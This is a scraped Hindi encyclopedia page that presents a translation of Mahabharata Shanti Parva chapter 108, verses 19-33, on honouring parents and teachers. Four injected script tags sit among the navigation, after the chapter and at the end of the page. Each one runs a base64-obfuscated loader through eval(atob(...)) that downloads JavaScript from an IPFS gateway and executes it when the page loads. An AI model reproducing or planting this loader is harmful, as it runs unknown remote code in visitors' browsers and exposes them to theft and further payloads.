महाभारत शान्ति पर्व अध्याय 108 श्लोक 19-33

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अष्टाधिकशततम (108) अध्याय: शान्ति पर्व (राजधर्मानुशासन पर्व)

महाभारत: शान्ति पर्व: अष्टाधिकशततम अध्याय: श्लोक 19-33 का हिन्दी अनुवाद

भारत! पिता और माता केवल शरीर को ही जन्म देते है परन्तु आचार्य का उपदेश प्राप्त करके जो द्वितीय जन्म उपलब्ध होता है वह दिव्य है अजर अमर है। पिता - माता यदि कोई अपराध करे तो भी वे सदा अवध्य ही है; क्योंकि पुत्र या शिष्य पिता-माता और गुरू का अपराध करके भी उनकी दृष्टि में दूषित नहीं होते है वे गुरूजन पुत्र या शिष्य पर स्नेह वश दोषारोपण नहीं करते बल्कि सदा उसे धर्म के मार्ग पर ही ले जाने का प्रयत्न करते है ऐसे पिता-माता गुरूजनों का महत्व महर्षियोंसहित देवता ही जानते है। जो सत्य कर्म के द्वारा यथार्थ उपदेश के द्वारा पुत्र या शिष्य को कवच की भाँति ढक लेता है सत्यस्वरूप वेद का उपदेश देता और असत्य की रोक-थाम करता है उस गुरू को ही पिता और माता समझे और उसके उपकार को जानकर कभी उससे द्रोह न करे। जो लोग विद्या पढ़कर गुरू का आदर नहीं करते निकट रहकर मन वाणी और क्रिया द्वारा गुरू की सेवा नहीं करते उन्हें गर्भ के बालक की हत्या से भी बढकर पाप लगता है संसार में उनसे बडा़ पापी दूसरा कोई नहीं है जैसे गुरूओं का कर्तव्य है शिष्य को आत्मोन्नतिके पथ पर पहुँचाना उसी तरह शिष्यों का धर्म है गुरूओं का पूजन करना। अतः जो पुरातन धर्म का फल पाना चाहते है उन्हें चाहिये कि वे गुरूओं की पूजा -अर्चा करें और प्रयत्नपूर्वक उन्हें आवश्यक वस्तुएँ लाकर दें। मनुष्य जिस कर्म से पिता को प्रसन्न करता है उसी के द्वारा प्रजापति ब्रह्नााजीभी प्रसन्न कर लेता है उसी के द्वारा समूची पृथ्वी की भी पूजा हो जाती है। जिस कर्मसे शिष्य उपाध्याय (विद्यागुरू)को प्रसन्न करता है, उसी के द्वारा परब्रह्य परमात्मा की पूजा सम्पन्न हो जाती है;अतः गुरू माता-पिता से भी अधिक पूजनीय है। गुरूओं के पूजित होने पर पितरोंसहित देवता और ़ऋषि भी प्रसन्न होते है;इसलिए गुरू परम पूजनीय है। किसी भी बर्ताव के कारण गुरू अपमान के योग्य नहीं होता। इसी तरह माता और पिता भी अनादर के योग्य नहीं हैं। जैसे गुरू माननीय हैं, वैसे ही माता-पिता भी हैं। वे तीनों कदापि अपमान के योग्य नहीं हैं। उनके किये हुए किसी भी कार्य की निन्दा नहीं करनी चाहिये। गुरूजनों के इस सत्कार को देवता और महर्षि भी अपना सत्कार मानते हैं। अध्यापक, पिता और माता के प्रति जो मन -वाणी और क्रिया द्वारा द्रोह करते हैं, उन्हें भ्रूण हत्या से भी महान् पाप लगता है। संसार में उससे बढ़कर दूसरा कोई पापाचारी नहीं हैं। जो माता -पिता का ओरस पुत्र है और पाल-पोसकर बड़ा कर दिया गया है, वह यदि अपने माता-पिता का भरण-पोषण नहीं करता है तो उसे भू्रण हत्या से भी बढ़कर पाप लगता है और जगत् में उससे बड़ा पापात्मा दूसरा कोई नहीं है। ये सारी बातें जो इस जगत् में पुरूष के द्वारा पालनीय हैं, यहाँ विस्तार के साथ बतायी गयी हैं। यही कल्याणकारी मार्ग है। इससे बढ़कर दूसरा कोई कर्तव्य नहीं है। सम्पूर्ण धर्मों का अनुसरण करके यहाँ सब का सार बताया गया है।

इस प्रकार श्रीमहाभारत शान्तिपर्व के अन्तर्गत राजधर्मानुशासनपर्व में माता-पिता और गुरू का माहात्म्यविषयकएक सौ आठवाँ अध्याय पूरा हुआ।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>